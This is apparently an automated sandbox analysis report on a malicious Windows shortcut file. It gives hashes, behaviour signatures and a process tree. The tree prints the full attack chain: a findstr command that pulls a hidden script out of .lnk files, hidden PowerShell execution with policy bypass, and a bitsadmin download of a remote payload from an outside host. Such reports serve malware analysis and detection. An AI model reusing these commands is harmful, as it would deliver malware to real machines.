Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-08-2024 19:01

General

  • Target

    pack-KRJ88981-99192.lnk

  • Size

    2KB

  • MD5

    4163cb3655dfdae03d13d623dd9dc8db

  • SHA1

    6183474325319e89dcf02e9bd54220d1d912638b

  • SHA256

    0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7

  • SHA512

    b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\system32\findstr.exe
        findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk
        3⤵
          PID:2960
        • C:\Windows\system32\cmd.exe
          cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2796
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Windows\system32\bitsadmin.exe
                bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1
                6⤵
                • Download via BitsAdmin
                PID:2776

Network

MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\Documents\blue.ps1

      Filesize

      941B

      MD5

      367a305a4630d346d724dbb691efb600

      SHA1

      d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd

      SHA256

      eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea

      SHA512

      9484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11

    • memory/2796-41-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

    • memory/2796-42-0x0000000001E00000-0x0000000001E08000-memory.dmp

      Filesize

      32KB